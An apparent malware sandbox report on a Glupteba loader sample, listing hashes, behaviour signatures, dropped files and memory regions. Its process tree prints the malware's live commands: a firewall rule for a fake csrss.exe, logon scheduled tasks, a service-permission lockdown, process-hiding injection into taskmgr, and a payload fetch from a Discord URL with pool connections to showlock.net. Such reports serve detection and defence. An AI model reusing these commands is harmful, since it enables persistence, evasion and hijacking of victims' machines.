Overview

overview

10

Static

static

1

winprofile

windows7-x64

10

winprofile

windows10-1703-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    302s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    01/05/2024, 23:27

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642.exe

  • Size

    4.2MB

  • MD5

    0a89ee182c830a447da5a308eae61c90

  • SHA1

    6bad2034ebea0495bf532ce27a2701e7aff25d44

  • SHA256

    92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642

  • SHA512

    2624876446a9ba7049ed23d160087a54a5ad74185820ff609288f89d4a1cf62db72900bddebe0ff78b3511276f82e28a3d2ae96926dfe8213768d2999b235904

  • SSDEEP

    98304:y2m5eOYCD1ID98VF2Kih+6YxfniOeVNR3JpIP6GA7sf3HgV11GHR:y2m5BYCDY8uVjYxfniXVNFJ2yR7sfQVg

Score
10/10
gluptebadiscoverydropperevasionloaderpersistencerootkittrojanupx

Malware Config

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 32 IoCs
  • Windows security bypass 2 TTPs 7 IoCs
    evasiontrojan
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Executes dropped EXE 7 IoCs
  • UPX packed file 23 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Windows security modification 2 TTPs 7 IoCs
    evasiontrojan
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 10 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 15 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642.exe
    "C:\Users\Admin\AppData\Local\Temp\92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4248
    • C:\Users\Admin\AppData\Local\Temp\92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642.exe
      "C:\Users\Admin\AppData\Local\Temp\92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642.exe"
      2⤵
      • Windows security bypass
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4832
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4792
      • C:\Windows\System32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3212
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:3420
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5036
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -nologo -noprofile
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4368
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Manipulates WinMonFS driver.
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3900
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -nologo -noprofile
          4⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1792
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:3556
        • C:\Windows\SYSTEM32\schtasks.exe
          schtasks /delete /tn ScheduledUpdate /f
          4⤵
            PID:2348
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4148
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2964
          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3372
          • C:\Windows\SYSTEM32\schtasks.exe
            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            4⤵
            • Creates scheduled task(s)
            PID:4628
          • C:\Windows\windefender.exe
            "C:\Windows\windefender.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:832
            • C:\Windows\SysWOW64\cmd.exe
              cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:1520
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Launches sc.exe
                • Suspicious use of AdjustPrivilegeToken
                PID:5020
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:1128
          • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe -xor=al2xoqueel0She4t -m=https://cdn.discordapp.com/attachments/1225871855328559147/1225878907014615161/kVYazCOZSwqudV?ex=6622bbb3&is=661046b3&hm=c80160577fcc82f0e337c537bdd214d60583ed75bb187a016d90f94471fc09b0& -pool tls://showlock.net:40001 -pool tls://showlock.net:443 -pool tcp://showlock.net:80
            4⤵
            • Executes dropped EXE
            PID:1324
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:2748
          • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
            4⤵
            • Executes dropped EXE
            PID:32
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -nologo -noprofile
            4⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious use of AdjustPrivilegeToken
            PID:4360
          • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
            4⤵
            • Executes dropped EXE
            PID:3540
    • C:\Windows\windefender.exe
      C:\Windows\windefender.exe
      1⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      PID:4600

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyucxwy1.mxc.ps1
      Filesize

      1B

      MD5

      c4ca4238a0b923820dcc509a6f75849b

      SHA1

      356a192b7913b04c54574d18c28d46e6395428ab

      SHA256

      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

      SHA512

      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\1bf850b4d9587c1017a75a47680584c4.exe
      Filesize

      2.0MB

      MD5

      1bf850b4d9587c1017a75a47680584c4

      SHA1

      75cd4738ffc07f203c3f3356bc946fdd0bcdbe19

      SHA256

      ac470c2fa05a67dd03cdc427e9957e661cd0ec7aecd9682ddb0b32c5cfc18955

      SHA512

      ed57be8c5a982bcbf901c2b035eb010e353508e7c7df338adc6e5c307e94427645e5f5ec28667fd861420b9411b4ade96ea6987519ed65e6c1d905b6eadfce08

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\713674d5e968cbe2102394be0b2bae6f.exe
      Filesize

      2.8MB

      MD5

      713674d5e968cbe2102394be0b2bae6f

      SHA1

      90ac9bd8e61b2815feb3599494883526665cb81e

      SHA256

      f724b2849e7dc38bf62114c11092020073bea509e2bc57dea7a94a2fc9c23057

      SHA512

      e9fba80067ac39d5907560abd044bb97dfcf078db2b6696ff4ca5990d9803a0c24b39d04e05682ac3dac8bc472e2ee0c573a46514e907f4d9673d4e7a76caafb

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      Filesize

      1.4MB

      MD5

      c7a5ef6e574ad12349750266dd005ab0

      SHA1

      25be08f1ff5657a902f68153ac5cb37a04e03912

      SHA256

      b062ab8381d0e37d4da61d1cda35870f7117d529f3bc9044c9f241863921bc42

      SHA512

      f0bc0a6c4e4642b6aad408e02f04adbc9a941d9f2113251614da80f53959ab9157e709022a4a613c81a83d6b337da9c664aa342044e5834d3c198b2709cd4790

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe
      Filesize

      2.0MB

      MD5

      dcb505dc2b9d8aac05f4ca0727f5eadb

      SHA1

      4f633edb62de05f3d7c241c8bc19c1e0be7ced75

      SHA256

      61f9194b9f33611ec902f02755cf2e86f0bbc84c2102c6e5d1874f9bae78e551

      SHA512

      31e1fce9aca3b5d9afc85640af04b4542b9897f7d60b699e3153516137d9358d3c101cacc04e9e594e36b8622e9489cecf0dda210662563565d80fb9a33549b3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
      Filesize

      281KB

      MD5

      d98e33b66343e7c96158444127a117f6

      SHA1

      bb716c5509a2bf345c6c1152f6e3e1452d39d50d

      SHA256

      5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

      SHA512

      705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      1c19c16e21c97ed42d5beabc93391fc5

      SHA1

      8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

      SHA256

      1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

      SHA512

      7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      e432cc3e9f93efe9e720196707b302f7

      SHA1

      74005e84b03246cb7b3ef112b610668c33c94d3a

      SHA256

      71e4c5c25a96d58d137668edc05f11e6e56990f69d6d8c57ec45507e94cecb40

      SHA512

      3ed357009cdf47afb7ab27d0b45aa8a4b08f29ef2e921c69dbc1ddf1e7dd521c1fc2dd897c8ab5c9513a6933c6deca150277371868e45c78592a540d9f324efa

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      c6e01b07049c8042e89ec17667a16d17

      SHA1

      c6f6711e0ac6dc4d602096f84dfe18e004679f3a

      SHA256

      f1ec636a4fe8dc2ca0bc725bca003b5ef384b9559987e53112ebf1b61d8863fe

      SHA512

      b0b4fe7fcf4b54909b9eabddb86b18209fae514a655ab4913027e3cce437602c3d75cb274d5c7c8e93159ce6e4a28792a64444b83f758e60a4fe8999d8709951

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      1ca9ed04407adfcad5c0c07ac75b8840

      SHA1

      93310a7f04eb0a6a712453ac5434a36f5057e852

      SHA256

      d7ab63c53f0f8c809c1e1947fdd9f0c6af183e3d4978981c8924456222833e5f

      SHA512

      152cccd6f9274f31890fdbcaf8f6f2803dca820a616564679a77af4de53d3cdc1fa828525883179bfde06d671be227ba8d283ff5c2a8212e45480938baae1ae7

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      8b3dc79e0dd5996d66858f33b3dbb141

      SHA1

      baf445aa528fac627ae7a7ca17bccbaf729315cc

      SHA256

      ed63a78c19c63aee82bac4881143fa3921bff630f050608d948bbb1e06f00c35

      SHA512

      b745f25ae9266c9f864766198af605a2d45a3abe9111133fc91d7ae3859e151a3602d7b88df920de5bf063b1c1023e3ac7ca5331f69233365efdb70f6ac1ea6f

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      78c3460ed0598202a4f21307e8ff6b9d

      SHA1

      ea71ff417218c42c90eb646ae503cd4f0926e8f3

      SHA256

      523011365bc1e2a5b0258f43df14a0500d11d6d3c9ecb780e7f049ba7b896eaa

      SHA512

      afe2d645ea2da8aeee548a0ac11b3e5832f9c153ca3dc7a5c06130fb7da0df36edbc2c5ba364b451c4a07b30f61d2f3ffeb03e0aa54631580a6f12b05178d369

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      424092027851f6c69d9c926d6a8b88ec

      SHA1

      81a0800cf48cca1b76a7dfabae236744da0106cc

      SHA256

      5413987862ebcb09e588c2ea11b5e311a3c683fd097b5aa12a36a5d9471866a4

      SHA512

      d26ea457cc1c631616caa5b4ce7b961e16682d0297375e9a2ba6f3f8b8e9c96f9b7f940ea43e03a5db8f69a27f15bf0c6c74326c30aa5f9690f89121c0e83b28

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      e6440b764807c29067b6a3a61d461320

      SHA1

      c7d04ff6f57a7b8d4aff3e8c53e92d6e1bb5f825

      SHA256

      87d6a4ea3eb3afbd207653d150f18e59497409c65069e90912d506eb4a83c419

      SHA512

      9a0bae3dc263394fcb0331920ae080e378417527f308b438eb73d79b0b73c7ee0794a457b8f17cd04a638cd7cbfb21e7182be2a4986b48133c2a8cc5aa9dd681

      Download Submit

    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
      Filesize

      18KB

      MD5

      2e4252f281a9e7b99b3c409589b77f4c

      SHA1

      0971e8e9a2151ef782c42e71bde6d45cb28a5f1a

      SHA256

      d508268c7da61c915fd7a8894dcc933e94440e80b78626796ca8c9dbabd9f998

      SHA512

      7f23f9191144e4b82a3f60d240c636d2945fffc5b9ce64affc4b9adfbdeb1bb786881509458005425c4eff4f951b88179e93df13325ac7cf86e38902f1e18db9

      Download Submit

    • C:\Windows\rss\csrss.exe
      Filesize

      4.2MB

      MD5

      0a89ee182c830a447da5a308eae61c90

      SHA1

      6bad2034ebea0495bf532ce27a2701e7aff25d44

      SHA256

      92244bff9c787c089b2f14a924534a1c17744994a84a8364890ab650cb736642

      SHA512

      2624876446a9ba7049ed23d160087a54a5ad74185820ff609288f89d4a1cf62db72900bddebe0ff78b3511276f82e28a3d2ae96926dfe8213768d2999b235904

      Download Submit

    • C:\Windows\windefender.exe
      Filesize

      2.0MB

      MD5

      8e67f58837092385dcf01e8a2b4f5783

      SHA1

      012c49cfd8c5d06795a6f67ea2baf2a082cf8625

      SHA256

      166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa

      SHA512

      40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

      Download Submit

    • memory/32-2270-0x0000000000E30000-0x00000000016FD000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/32-2517-0x0000000000E30000-0x00000000016FD000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/32-2525-0x0000000000E30000-0x00000000016FD000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/32-2529-0x0000000000E30000-0x00000000016FD000-memory.dmp

      Filesize

      8.8MB

      Download

    • memory/832-1743-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/832-1747-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1128-1809-0x000000006FF50000-0x00000000702A0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1128-1787-0x0000000008030000-0x0000000008380000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1128-1808-0x000000006FF00000-0x000000006FF4B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/1128-1814-0x0000000009BC0000-0x0000000009C65000-memory.dmp

      Filesize

      660KB

      Download

    • memory/1128-1789-0x0000000008990000-0x00000000089DB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/1324-2032-0x0000000000400000-0x00000000008E1000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1324-2027-0x0000000000400000-0x00000000008E1000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/1792-1027-0x00000000082E0000-0x000000000832B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/1792-1052-0x0000000009350000-0x00000000093F5000-memory.dmp

      Filesize

      660KB

      Download

    • memory/1792-1047-0x0000000070110000-0x0000000070460000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1792-1046-0x00000000700A0000-0x00000000700EB000-memory.dmp

      Filesize

      300KB

      Download

    • memory/1792-1025-0x0000000007760000-0x0000000007AB0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2748-2052-0x000000006FF00000-0x000000006FF4B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/2748-2053-0x000000006FF50000-0x00000000702A0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2964-1521-0x0000000070040000-0x0000000070390000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/2964-1520-0x000000006FFF0000-0x000000007003B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/3540-2514-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3540-2519-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3540-2523-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3540-2526-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3540-2531-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3540-2535-0x0000000000400000-0x00000000008E8000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/3900-1758-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1750-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-2534-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-2530-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-2527-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1762-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-2522-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1760-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1766-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1768-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1756-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-2518-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-2515-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1784-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1782-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1739-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1780-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1778-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1776-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1774-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1748-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1772-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1764-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1752-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1770-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/3900-1754-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/4148-1285-0x0000000070040000-0x0000000070390000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4148-1290-0x0000000008F70000-0x0000000009015000-memory.dmp

      Filesize

      660KB

      Download

    • memory/4148-1284-0x000000006FFF0000-0x000000007003B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4148-1265-0x00000000079F0000-0x0000000007A3B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4148-1263-0x0000000007430000-0x0000000007780000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4248-15-0x00000000087C0000-0x00000000087DC000-memory.dmp

      Filesize

      112KB

      Download

    • memory/4248-74-0x0000000070020000-0x000000007006B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4248-280-0x000000000A910000-0x000000000A918000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4248-298-0x0000000073310000-0x00000000739FE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4248-76-0x000000000A740000-0x000000000A75E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4248-81-0x000000000A7A0000-0x000000000A845000-memory.dmp

      Filesize

      660KB

      Download

    • memory/4248-73-0x000000000A760000-0x000000000A793000-memory.dmp

      Filesize

      204KB

      Download

    • memory/4248-16-0x0000000008840000-0x000000000888B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4248-35-0x0000000009850000-0x000000000988C000-memory.dmp

      Filesize

      240KB

      Download

    • memory/4248-66-0x0000000009910000-0x0000000009986000-memory.dmp

      Filesize

      472KB

      Download

    • memory/4248-75-0x0000000070070000-0x00000000703C0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4248-4-0x000000007331E000-0x000000007331F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4248-14-0x00000000083C0000-0x0000000008710000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4248-7-0x0000000007340000-0x0000000007376000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4248-9-0x0000000007A00000-0x0000000008028000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4248-82-0x000000000A9A0000-0x000000000AA34000-memory.dmp

      Filesize

      592KB

      Download

    • memory/4248-8-0x0000000073310000-0x00000000739FE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4248-12-0x00000000082E0000-0x0000000008346000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4248-275-0x000000000A920000-0x000000000A93A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4248-13-0x0000000008350000-0x00000000083B6000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4248-11-0x0000000008060000-0x0000000008082000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4248-10-0x0000000073310000-0x00000000739FE000-memory.dmp

      Filesize

      6.9MB

      Download

    • memory/4360-2292-0x000000006FF00000-0x000000006FF4B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4360-2293-0x000000006FF50000-0x00000000702A0000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4368-803-0x0000000070140000-0x000000007018B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4368-804-0x00000000701B0000-0x0000000070500000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4600-1753-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/4600-1749-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/4600-1746-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/4600-1759-0x0000000000400000-0x00000000008DF000-memory.dmp

      Filesize

      4.9MB

      Download

    • memory/4760-302-0x0000000006420000-0x0000000006D0B000-memory.dmp

      Filesize

      8.9MB

      Download

    • memory/4760-1-0x0000000004680000-0x0000000004A7B000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/4760-301-0x0000000000400000-0x0000000000D1C000-memory.dmp

      Filesize

      9.1MB

      Download

    • memory/4760-2-0x0000000006420000-0x0000000006D0B000-memory.dmp

      Filesize

      8.9MB

      Download

    • memory/4760-3-0x0000000000400000-0x0000000000D1C000-memory.dmp

      Filesize

      9.1MB

      Download

    • memory/4760-299-0x0000000000400000-0x0000000004420000-memory.dmp

      Filesize

      64.1MB

      Download

    • memory/4792-306-0x0000000008540000-0x000000000858B000-memory.dmp

      Filesize

      300KB

      Download

    • memory/4792-326-0x00000000701B0000-0x0000000070500000-memory.dmp

      Filesize

      3.3MB

      Download

